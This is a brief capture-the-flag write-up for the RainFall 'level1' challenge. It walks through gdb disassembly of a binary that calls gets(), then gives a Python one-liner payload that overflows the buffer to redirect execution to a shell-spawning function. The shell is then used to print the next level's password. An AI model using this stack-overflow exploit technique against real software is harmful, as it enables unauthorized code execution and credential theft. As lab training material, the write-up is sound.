(gdb) disassemble main

0x08048486 <+6>:	sub    esp,0x50 // allocation
0x08048490 <+16>:	call   0x8048340 <gets@plt> //gets is knows for filling a buffer without checking the size.

i(gdb) info function

0x08048420  frame_dummy
0x08048444  run
0x08048480  main

(gdb) disassemble run

0x0804846d <+41>:	call   0x8048350 <fwrite@plt>
0x08048479 <+53>:	call   0x8048360 <system@plt> 

(gdb) p run
$1 = {<text variable, no debug info>} 0x8048444 <run>

try to fill the buffer allocated to reach the return address and change it with the one for run

python -c "print('a'*76+'\x44\x84\x04\x08')" > pl
cat pl - | ./level1 // the - keep the program runnnig idk how, if not used the program run sh then exit.
level1@RainFall:~$ cat pl - | ./level1
Good... Wait what?
whoami
level2
cd ..
cd level2
cat .pass
53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77

